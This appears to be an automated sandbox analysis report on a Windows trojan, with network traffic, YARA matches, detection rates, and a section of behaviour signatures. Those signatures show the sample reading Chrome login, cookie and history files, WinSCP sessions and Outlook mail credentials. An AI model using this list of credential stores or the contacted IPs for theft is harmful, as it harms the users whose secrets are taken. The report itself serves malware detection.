Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.54.82.13:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.76.12.6:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeSection loaded: msxml3.dllJump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: 00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: classification engineClassification label: mal72.spyw.winEXE@1/1@25/8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeMutant created: \Sessions\1\BaseNamedObjects\53E61D202B0F807656615
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeVirustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeMetadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeRegistry key enumerated: More than 171 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationDLL Side-Loading1DLL Side-Loading1Masquerading1OS Credential Dumping1Process Discovery11Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDLL Side-Loading1Credentials in Registry1System Information Discovery23Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped